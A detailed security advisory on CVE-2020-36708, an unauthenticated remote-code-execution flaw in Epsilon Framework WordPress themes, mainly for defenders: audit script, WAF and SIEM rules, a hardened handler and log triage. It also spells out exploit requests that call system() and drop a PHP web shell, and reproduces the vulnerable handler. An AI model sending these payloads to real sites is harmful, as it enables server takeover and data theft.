CVE-2020-36708
Weakness (CWE)
CVSS Vector
CVSS v3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Confidentiality: High
- Integrity: High
- Availability: High
Description
The following themes for WordPress are vulnerable to Function Injections in versions up to and including Shapely <= 1.2.7, NewsMag <= 2.4.1, Activello <= 1.4.0, Illdy <= 2.1.4, Allegiant <= 1.2.2, Newspaper X <= 1.3.1, Pixova Lite <= 2.0.5, Brilliance <= 1.2.7, MedZone Lite <= 1.2.4, Regina Lite <= 2.0.4, Transcend <= 1.1.8, Affluent <= 1.1.0, Bonkers <= 1.0.4, Antreas <= 1.0.2, Sparkling <= 2.4.8, and NatureMag Lite <= 1.0.4. This is due to epsilon_framework_ajax_action. This makes it possible for unauthenticated attackers to call functions and achieve remote code execution.
Comprehensive Technical Analysis of CVE-2020-36708
WordPress Epsilon Framework Themes – Unauthenticated Function Injection Vulnerability
1. Vulnerability Assessment & Severity Evaluation
CVE ID: CVE-2020-36708
CVSS Score: 9.8 (Critical) – AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Vulnerability Type: Unauthenticated Function Injection (Remote Code Execution - RCE)
Root Cause: The epsilon_framework_ajax_action AJAX handler in the Epsilon Framework (bundled with the themes below) is registered for unauthenticated requests and invokes a callable named in the request, with no nonce, capability or allowlist check, so anyone who can reach admin-ajax.php can call arbitrary PHP functions.
Severity Breakdown:
- Attack Vector (AV:N): Exploitable remotely over the network without authentication.
- Attack Complexity (AC:L): Low – No special conditions required.
- Privileges Required (PR:N): None – Unauthenticated exploitation.
- User Interaction (UI:N): None – No user interaction needed.
- Scope (S:U): Unchanged – Impact confined to the vulnerable component.
- Confidentiality (C:H), Integrity (I:H), Availability (A:H): High impact across all CIA triad components.
Exploitability: High. The NinTechNet advisory describes the flaw in enough detail to reproduce it, and Wordfence observed mass exploitation in November 2020 (more than 7.5 million attempts against over 1.5 million sites in two days, most of them probes for the vulnerable handler rather than full exploitation).
2. Potential Attack Vectors & Exploitation Methods
Exploitation Mechanism:
The vulnerability stems from the Epsilon Framework, a theme-options and Customizer library bundled with all of the themes listed above. Its epsilon_framework_ajax_action handler fails to:
- Validate the user-supplied parameters that name the callable and its arguments.
- Restrict the callable to a fixed allowlist of framework methods.
- Require authentication or a nonce before processing the AJAX request.
An attacker can therefore send an HTTP POST to the WordPress AJAX endpoint (/wp-admin/admin-ajax.php) with:
- action=epsilon_framework_ajax_action, which routes the request to the vulnerable handler through the wp_ajax_nopriv_ hook.
- Further parameters naming the PHP function to call and the arguments to pass it.
Exploitation Steps:
- Reconnaissance:
  - Identify sites running an affected theme: rendered pages reference assets under wp-content/themes/<slug>/, and a direct request to wp-content/themes/<slug>/style.css confirms the slug.
  - Confirm the theme version from the Version: header of style.css or from the theme's readme.txt.
- Exploit Delivery:
  - Send a request to /wp-admin/admin-ajax.php carrying action=epsilon_framework_ajax_action plus the parameters that name the callable and its arguments. Illustrative shape (the parameter names follow the simplified model in section 6; the exact layout the framework accepts is documented in the NinTechNet write-up):

    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: vulnerable-site.com
    Content-Type: application/x-www-form-urlencoded

    action=epsilon_framework_ajax_action&function=system&args[]=id

  - Example payloads (same illustrative shape):
    - Command execution: function=system&args[]=whoami (requires system() to be enabled in PHP).
    - Web-shell drop: function=file_put_contents&args[]=/var/www/html/shell.php&args[]=<?php system($_GET['cmd']); ?> (URL-encoded on the wire; requires a document root writable by the PHP worker).
    - Instance methods such as $wpdb->query() are not reachable by name through call_user_func_array(), so database tampering is a second step, through a dropped shell or the credentials read from wp-config.php.
- Post-Exploitation:
  - Establish persistence (e.g., backdoor installation).
  - Escalate privileges on the host if the PHP worker's permissions or a local flaw allow it.
  - Exfiltrate sensitive data (wp-config.php holds the database credentials and authentication salts).
Proof-of-Concept (PoC) Availability:
- Publicly disclosed PoCs exist (e.g., NinTechNet).
- Mass scanning and exploitation observed in the wild (e.g., Wordfence reports).
3. Affected Systems & Software Versions
Vulnerable Themes & Versions:
The following WordPress themes are affected up to and including the versions listed. The patched versions shown are the first releases after the vulnerable range; confirm against each theme's changelog before relying on a specific number.
| Theme Name | Vulnerable Version | Patched Version |
|---|---|---|
| Shapely | ≤ 1.2.7 | 1.2.8+ |
| NewsMag | ≤ 2.4.1 | 2.4.2+ |
| Activello | ≤ 1.4.0 | 1.4.1+ |
| Illdy | ≤ 2.1.4 | 2.1.5+ |
| Allegiant | ≤ 1.2.2 | 1.2.3+ |
| Newspaper X | ≤ 1.3.1 | 1.3.2+ |
| Pixova Lite | ≤ 2.0.5 | 2.0.6+ |
| Brilliance | ≤ 1.2.7 | 1.2.8+ |
| MedZone Lite | ≤ 1.2.4 | 1.2.5+ |
| Regina Lite | ≤ 2.0.4 | 2.0.5+ |
| Transcend | ≤ 1.1.8 | 1.1.9+ |
| Affluent | ≤ 1.1.0 | 1.1.1+ |
| Bonkers | ≤ 1.0.4 | 1.0.5+ |
| Antreas | ≤ 1.0.2 | 1.0.3+ |
| Sparkling | ≤ 2.4.8 | 2.4.9+ |
| NatureMag Lite | ≤ 1.0.4 | 1.0.5+ |
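
To turn the table above into a check, here is an added example (not from the advisory or any of the themes) that walks wp-content/themes/*/style.css, reads the Theme Name:, Version: and Template: headers that WordPress itself parses, and flags any listed theme at or below its last vulnerable release. The version table is copied from above; the path argument, the output format and the treatment of child themes are the example's own.

```php
<?php
// Added example (not the advisory's or any theme's code): audit an install
// against the version table above. Usage from the shell:
//   php epsilon-audit.php /var/www/html/wp-content/themes
// Assumes the standard layout wp-content/themes/<slug>/style.css.

// Last vulnerable release per theme, keyed by the style.css "Theme Name:" value.
$lastVulnerable = array(
    'Shapely'        => '1.2.7', 'NewsMag'      => '2.4.1', 'Activello'    => '1.4.0',
    'Illdy'          => '2.1.4', 'Allegiant'    => '1.2.2', 'Newspaper X'  => '1.3.1',
    'Pixova Lite'    => '2.0.5', 'Brilliance'   => '1.2.7', 'MedZone Lite' => '1.2.4',
    'Regina Lite'    => '2.0.4', 'Transcend'    => '1.1.8', 'Affluent'     => '1.1.0',
    'Bonkers'        => '1.0.4', 'Antreas'      => '1.0.2', 'Sparkling'    => '2.4.8',
    'NatureMag Lite' => '1.0.4',
);

// Read the header fields WordPress itself parses from the style.css comment block.
function parse_style_header( string $css ): array {
    $out    = array( 'name' => null, 'version' => null, 'template' => null );
    $fields = array( 'name' => 'Theme Name', 'version' => 'Version', 'template' => 'Template' );
    foreach ( $fields as $key => $field ) {
        if ( preg_match( '/^[ \t\/*#@]*' . preg_quote( $field, '/' ) . ':(.*)$/mi', $css, $m ) ) {
            $out[ $key ] = trim( $m[1] );
        }
    }
    return $out;
}

// Inclusive comparison: the table lists the LAST vulnerable release of each theme.
function is_vulnerable( ?string $name, ?string $version, array $table ): bool {
    return $name !== null && $version !== null
        && isset( $table[ $name ] )
        && version_compare( $version, $table[ $name ], '<=' );
}

$dir  = rtrim( $argv[1] ?? 'wp-content/themes', '/' );
$exit = 0;
foreach ( glob( $dir . '/*/style.css' ) as $css ) {
    $h = parse_style_header( (string) file_get_contents( $css ) );
    if ( $h['template'] !== null ) {
        // Child theme: the parent named in Template: carries the framework, and its own
        // style.css is checked when the loop reaches that directory.
        continue;
    }
    if ( is_vulnerable( $h['name'], $h['version'], $lastVulnerable ) ) {
        printf( "VULNERABLE  %-16s %-8s %s\n", $h['name'], $h['version'], $css );
        $exit = 1;
    } elseif ( isset( $lastVulnerable[ $h['name'] ] ) ) {
        printf( "ok          %-16s %-8s %s\n", $h['name'], $h['version'], $css );
    }
}
exit( $exit );
```

The script exits non-zero when any listed theme is in its vulnerable range, so it can sit in a cron job or a CI step for a fleet of sites. It only inspects installed themes; an inactive vulnerable theme does not register the AJAX hook, but it is still worth removing, since a later activation would reopen the hole.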
Affected Components:
- Epsilon Framework (the library shared by all listed themes).
- WordPress AJAX handler (wp-admin/admin-ajax.php), which dispatches the wp_ajax_nopriv_ hook to the framework's handler.
Environmental Factors:
- WordPress Version: Any (the vulnerability is in the theme, not in core).
- PHP Version: No direct dependency. Command execution needs system(), exec(), passthru() or similar to be enabled; with those disabled, file-writing functions such as file_put_contents() are still reachable through the same path, so disable_functions reduces rather than removes the impact.
- Web Server: Apache or Nginx (no server-specific requirement).
4. Recommended Mitigation Strategies
Immediate Actions:
- Patch Management:
  - Upgrade all affected themes to the patched versions in the table above.
  - If no patch is available, deactivate the theme and switch to an alternative. Only the active theme's functions.php is loaded, so a deactivated theme never registers its AJAX hooks; note that an active child theme still loads its parent's code.
- Workarounds (if patching is delayed):
  - Block the unauthenticated path to the handler. wp_ajax_nopriv_* is an action hook, not a filter, so add_filter(..., '__return_false') on it has no effect; instead refuse the action before it is dispatched, from a must-use plugin under wp-content/mu-plugins/ so the change survives theme updates:

    ```php
    add_action( 'init', function () {
        if ( ! is_user_logged_in()
             && 'epsilon_framework_ajax_action' === ( $_REQUEST['action'] ?? '' ) ) {
            wp_die( 'Forbidden', '', array( 'response' => 403 ) );
        }
    } );
    ```

  - Restrict access to /wp-admin/admin-ajax.php by source IP. This also breaks the front-end features of any plugin that uses admin-ajax.php, so treat it as a short-term measure. Apache 2.4 syntax:

    ```apache
    <Files "admin-ajax.php">
        Require ip 203.0.113.0/24
    </Files>
    ```

    (On Apache 2.2 use Order Deny,Allow / Deny from all / Allow from <trusted-IPs>.)
  - Disable dangerous PHP functions in php.ini:

    disable_functions = system, exec, passthru, shell_exec, proc_open, popen

    This blocks shell execution but not file writes through the same handler, so it is a partial control, not a fix.
- Monitoring & Detection:
  - Log Analysis: watch admin-ajax.php for action=epsilon_framework_ajax_action. Standard access logs record only the query string, and the attacks are POST requests, so this needs request-body logging (a WAF audit log, or a reverse proxy configured to log bodies). With access logs alone, the signal is a spike of POSTs to admin-ajax.php from many source IPs.
  - WAF Rules: a ModSecurity rule that blocks the action (this also blocks legitimate, authenticated Customizer use of the handler until the theme is patched):

    ```
    SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
        "id:1000,phase:2,log,deny,status:403,chain,\
        msg:'CVE-2020-36708 Epsilon Framework ajax action'"
        SecRule ARGS:action "@streq epsilon_framework_ajax_action" "t:none,t:lowercase"
    ```

    phase:2 and SecRequestBodyAccess On are required so that ARGS includes POST parameters.
  - File Integrity Monitoring (FIM): detect unauthorized file modifications (e.g., new PHP files under /wp-content/).
Long-Term Strategies:
- Theme & Plugin Hardening:
  - Audit Third-Party Themes/Plugins: use tools such as WPScan or Wordfence to identify vulnerable components.
  - Principle of Least Privilege: run the PHP worker with minimal filesystem permissions; a document root that is not writable by that user turns the web-shell drop into a failed write.
- Security Headers & Hardening:
  - Implement CSP (Content Security Policy) and HSTS. Neither stops this RCE, but they limit what injected content or a downgraded connection can do afterwards.
  - Disable PHP execution in upload directories so that a dropped file cannot run. With mod_php, in httpd.conf:

    ```apache
    <Directory "/var/www/html/wp-content/uploads">
        php_flag engine off
    </Directory>
    ```

    Under PHP-FPM php_flag is ignored; deny .php files under uploads at the web-server level instead (Apache: a <FilesMatch "\.php$"> block with Require all denied; Nginx: a location rule matching ^/wp-content/uploads/.*\.php$ that returns 403).
- Incident Response Planning:
  - Isolate Compromised Systems: if exploitation is detected, take the site offline and perform forensic analysis before cleaning.
  - Reset Credentials: change all WordPress, database and server credentials, and rotate the salts in wp-config.php, since that file is the first thing an attacker reads.
  - Restore from Backup: restore from a backup taken before the compromise, then patch before bringing the site back online.
5. Impact on the Cybersecurity Landscape
Exploitation Trends:
- Mass Scanning: threat actors scan WordPress sites at scale for the affected themes; the Wordfence telemetry from November 2020 consisted mostly of probing requests, the usual prelude to automated exploitation.
- Automated Exploits: once a site is confirmed vulnerable, the same tooling typically drops a web shell or backdoor, used for cryptojacking, SEO spam and malware distribution.
- Supply Chain Risk: one framework embedded in sixteen themes turned a single bug into sixteen advisories; theme authors who vendor a shared library inherit its vulnerabilities and must ship its fixes.
Broader Implications:
- WordPress Ecosystem Risks:
  - Theme/Plugin Vulnerabilities: a recurring issue, driven by uneven secure-coding practices across third-party themes and plugins.
  - Delayed Patching: many site owners fail to update themes and plugins, leaving sites exposed for months or years.
- Attacker Motivations:
  - Initial Access: a foothold on the web server for further exploitation.
  - Data Exfiltration: databases containing PII, payment data or credentials.
  - Malware Distribution: ransomware, backdoors or cryptominers.
- Regulatory & Compliance Impact:
  - GDPR/CCPA: unauthorized data access may trigger breach-notification duties.
  - PCI DSS: compromised sites handling payment data risk non-compliance.
6. Technical Details for Security Professionals
Vulnerability Deep Dive:
Root Cause Analysis:
The epsilon_framework_ajax_action handler is registered on both the wp_ajax_ and wp_ajax_nopriv_ hooks, so it is reachable by anyone who can reach admin-ajax.php, and it processes the request without:
- Authentication or authorization checks: no is_user_logged_in(), current_user_can() or check_ajax_referer() call before dispatch.
- Input validation: the callable name and its arguments come straight from the request and are handed to call_user_func_array().
- Allowlisting: no fixed map of permitted handlers, so any function or Class::method that PHP can resolve by name is reachable.
Vulnerable Code Snippet (simplified model; the parameter names are illustrative and the real handler's layout is given in the NinTechNet write-up):

```php
add_action( 'wp_ajax_epsilon_framework_ajax_action', 'epsilon_framework_ajax_action' );
add_action( 'wp_ajax_nopriv_epsilon_framework_ajax_action', 'epsilon_framework_ajax_action' ); // unauthenticated path

function epsilon_framework_ajax_action() {
    $function = $_POST['function']; // callable name taken unsanitized from the request
    $args     = $_POST['args'];     // arguments taken unsanitized from the request
    call_user_func_array( $function, $args ); // arbitrary function or Class::method execution
}
```
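
Because the bug is a dispatch pattern rather than a single bad line, the fix is to make sure no request value ever reaches call_user_func_array() as a callable. The following is an added example, not the Epsilon Framework's code nor the themes' actual patch, that shows the unsafe pattern from the snippet above and then a hardened handler with the three checks the workaround section asks for (no anonymous hook, a nonce, a capability check) plus an allowlist. The class Example_Ajax, the hook example_ajax_action, the nonce action example_ajax_nonce and the two handler methods are assumed for illustration; the WordPress functions used (check_ajax_referer, current_user_can, wp_send_json_*, sanitize_key, wp_unslash, remove_theme_mod, set_theme_mod) are standard core APIs.

```php
<?php
// Added example, not the Epsilon Framework's code or the themes' actual patch.
// First the unsafe pattern the section describes, then a hardened handler.
// Assumed for illustration: class Example_Ajax, hook example_ajax_action,
// nonce action example_ajax_nonce, and the two handler methods.

// ---- Unsafe pattern (the bug class): the request names the callable. ----
function vulnerable_ajax_action() {
    $function = $_POST['function'] ?? '';
    $args     = (array) ( $_POST['args'] ?? array() );
    call_user_func_array( $function, $args ); // e.g. system('id')
    wp_die();
}

// ---- Hardened handler: authenticated hook only, nonce, capability, allowlist. ----
final class Example_Ajax {
    // The request value is a KEY into this map, never a callable; the map is the allowlist.
    private const ALLOWED = array(
        'reset_section' => 'handle_reset_section',
        'import_demo'   => 'handle_import_demo',
    );

    public static function register() {
        // Deliberately no wp_ajax_nopriv_ registration: anonymous requests never reach dispatch().
        add_action( 'wp_ajax_example_ajax_action', array( __CLASS__, 'dispatch' ) );
    }

    public static function dispatch() {
        // 1. CSRF: the nonce issued to the Customizer page must accompany the request (dies on failure).
        check_ajax_referer( 'example_ajax_nonce', 'nonce' );
        // 2. Authorization: only users allowed to change theme options.
        if ( ! current_user_can( 'edit_theme_options' ) ) {
            wp_send_json_error( 'forbidden', 403 );
        }
        // 3. Allowlist: unknown keys are rejected before anything is called.
        $key = sanitize_key( wp_unslash( $_POST['function'] ?? '' ) );
        if ( ! array_key_exists( $key, self::ALLOWED ) ) {
            wp_send_json_error( 'unknown action', 400 );
        }
        // 4. Arguments are plain sanitized strings; nested arrays are dropped.
        $raw  = (array) wp_unslash( $_POST['args'] ?? array() );
        $args = array_map( 'sanitize_text_field', array_filter( $raw, 'is_scalar' ) );

        $method = self::ALLOWED[ $key ];
        wp_send_json_success( self::$method( array_values( $args ) ) );
    }

    private static function handle_reset_section( array $args ): array {
        $section = sanitize_key( $args[0] ?? '' );
        if ( '' === $section ) {
            return array( 'reset' => false );
        }
        remove_theme_mod( $section );
        return array( 'reset' => true, 'section' => $section );
    }

    private static function handle_import_demo( array $args ): array {
        // The request picks one of two theme-shipped demo sets; it never supplies a path or code.
        $set = in_array( $args[0] ?? '', array( 'default', 'magazine' ), true ) ? $args[0] : 'default';
        set_theme_mod( 'example_demo_set', $set );
        return array( 'imported' => $set );
    }
}
Example_Ajax::register();
```

The checks are independent and each closes a different door: dropping the wp_ajax_nopriv_ registration alone would have removed the unauthenticated path that CVE-2020-36708 describes, the nonce stops a logged-in administrator's browser from being driven cross-site, the capability check stops subscriber-level accounts, and the allowlist removes the bug class entirely, since a typo or a new method name can at worst produce a 400 rather than a call into system().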
Exploit Chaining:
- Arbitrary file read: call file_get_contents() on wp-config.php to obtain the database credentials and salts (the contents only reach the attacker if the handler echoes the return value; otherwise chain with a file write to a web-readable path).
- Remote payload fetch: retrieve a PHP script from an attacker-controlled server, write it into the document root, then request it directly.
- Privilege Escalation: the resulting shell runs as the PHP worker user (commonly www-data); reaching root requires a separate local exploit or misconfiguration on the host.
Forensic Indicators:
- Log Entries: POST requests to /wp-admin/admin-ajax.php whose body carries action=epsilon_framework_ajax_action, for example (illustrative parameter layout):

    POST /wp-admin/admin-ajax.php HTTP/1.1
    action=epsilon_framework_ajax_action&function=system&args[]=whoami

- File System Artifacts:
  - Unauthorized PHP files in /wp-content/uploads/ or /wp-content/themes/.
  - Modified .htaccess or wp-config.php.
- Network Indicators:
  - Outbound connections from the web server to attacker infrastructure (e.g., hxxp://attacker[.]com/shell.txt) shortly after such a request.
Detection & Hunting:
- SIEM Rules (e.g., Splunk, ELK). The search below assumes a sourcetype that carries the request body (a WAF audit log); with plain access logs only GET parameters appear in the URI, and the attacks are POSTs. Field names (uri, body, src_ip, user_agent) depend on your sourcetype:

    index=wordpress (sourcetype=apache:access OR sourcetype=modsec:audit)
    | search uri="/wp-admin/admin-ajax.php*"
        (uri="*epsilon_framework_ajax_action*" OR body="*epsilon_framework_ajax_action*")
    | stats count, values(user_agent) AS user_agent BY src_ip
    | sort - count

- YARA Rule for captured requests (PCAPs or WAF audit logs; it does not find web shells already on disk, which need their own rules):

    rule WordPress_Epsilon_RCE
    {
        meta:
            description = "Detects CVE-2020-36708 exploitation attempts in captured HTTP requests"
            reference   = "CVE-2020-36708"
        strings:
            $ajax    = "/wp-admin/admin-ajax.php"
            $epsilon = "epsilon_framework_ajax_action"
            $func    = /\b(system|exec|passthru|shell_exec|proc_open|file_put_contents)\b/
        condition:
            $ajax and $epsilon and $func
    }
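
As a worked version of the log-analysis guidance in both the Monitoring & Detection and the Detection & Hunting sections, here is an added example (not part of the advisory) that triages request records for this CVE. It takes one JSON object per line describing a request together with its body, as a WAF audit-log export or a body-logging reverse proxy would produce; plain access logs omit POST bodies and cannot feed it. The field names src_ip, uri, cookie and body are assumed, and the sample records are constructed, not real traffic.

```php
<?php
// Added example for the monitoring and hunting sections; not part of the
// advisory. Input: one JSON object per line describing a request WITH its body
// (a WAF audit-log export, or a proxy that logs request bodies). Field names
// src_ip, uri, cookie, body are assumed; the sample records are constructed.

const TARGET_ACTION = 'epsilon_framework_ajax_action';

// Callables whose presence in any parameter turns a probe into an execution or
// file-write attempt. Matched by VALUE, not by parameter name, because the
// exact parameter layout of the exploit may differ from the illustrative requests above.
const DANGEROUS = array(
    'system', 'exec', 'passthru', 'shell_exec', 'proc_open', 'popen', 'eval', 'assert',
    'file_put_contents', 'file_get_contents', 'fwrite', 'unlink', 'copy',
);

// Returns null for irrelevant requests, otherwise a finding for the analyst.
function triage( array $rec ): ?array {
    $path = (string) parse_url( $rec['uri'] ?? '', PHP_URL_PATH );
    if ( substr( $path, -14 ) !== 'admin-ajax.php' ) {
        return null; // the wp_ajax_* hooks only fire from admin-ajax.php
    }
    // admin-ajax.php reads $_REQUEST, so merge query-string and body parameters.
    $params = array();
    if ( $query = parse_url( $rec['uri'], PHP_URL_QUERY ) ) {
        parse_str( $query, $params );
    }
    if ( ! empty( $rec['body'] ) ) {
        parse_str( $rec['body'], $bodyParams );
        $params = array_merge( $params, $bodyParams );
    }
    if ( ( $params['action'] ?? '' ) !== TARGET_ACTION ) {
        return null;
    }
    // Flatten nested args[] arrays and look for callable names among the values.
    $values = array();
    array_walk_recursive( $params, function ( $v ) use ( &$values ) {
        $values[] = strtolower( trim( (string) $v ) );
    } );
    $hits = array_values( array_intersect( DANGEROUS, $values ) );

    // No wordpress_logged_in_* cookie means the request took the nopriv path.
    $unauth = strpos( $rec['cookie'] ?? '', 'wordpress_logged_in_' ) === false;

    return array(
        'src_ip'    => $rec['src_ip'] ?? '?',
        'severity'  => $hits ? 'high' : ( $unauth ? 'medium' : 'info' ),
        'unauth'    => $unauth,
        'callables' => $hits,
    );
}

// Constructed sample records (not real traffic): an RCE attempt, a bare probe,
// an authenticated Customizer call, and an unrelated heartbeat.
$samples = array(
    '{"src_ip":"203.0.113.5","uri":"/wp-admin/admin-ajax.php","cookie":"","body":"action=epsilon_framework_ajax_action&function=system&args[]=id"}',
    '{"src_ip":"203.0.113.9","uri":"/wp-admin/admin-ajax.php","cookie":"","body":"action=epsilon_framework_ajax_action&args[0]=x"}',
    '{"src_ip":"198.51.100.2","uri":"/wp-admin/admin-ajax.php","cookie":"wordpress_logged_in_ab12=admin","body":"action=epsilon_framework_ajax_action&function=reset_section&args[]=header"}',
    '{"src_ip":"198.51.100.7","uri":"/wp-admin/admin-ajax.php","cookie":"","body":"action=heartbeat"}',
);
foreach ( $samples as $line ) {
    $f = triage( json_decode( $line, true ) );
    if ( $f !== null ) {
        printf( "%-6s %-13s unauth=%s callables=%s\n",
            $f['severity'], $f['src_ip'], $f['unauth'] ? 'y' : 'n',
            implode( ',', $f['callables'] ) ?: '-' );
    }
}
```

Run against real exports, replace the $samples loop with a loop over fopen('php://stdin', 'r') and feed it the JSON lines. The three severities map to actions: high means a callable name was supplied and the host should be treated as compromised until the file system and process list say otherwise; medium is an anonymous probe of the kind Wordfence saw en masse and is worth blocking at the edge; info is an authenticated use of the handler, which is expected Customizer traffic on an unpatched theme.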
Conclusion
CVE-2020-36708 represents a critical unauthenticated RCE vulnerability in multiple WordPress themes due to insecure implementation of the Epsilon Framework. Its high CVSS score (9.8) and ease of exploitation make it a prime target for threat actors. Organizations must prioritize patching, implement compensating controls, and monitor for exploitation attempts to mitigate risk.
Key Takeaways for Security Teams:
- Patch immediately – Upgrade all affected themes.
- Monitor AJAX endpoints – Detect and block suspicious requests.
- Harden WordPress – Disable dangerous functions, restrict access, and deploy WAF rules.
- Assume breach – Conduct forensic analysis if exploitation is suspected.
For further details, refer to the Wordfence and NinTechNet advisories linked in the CVE references.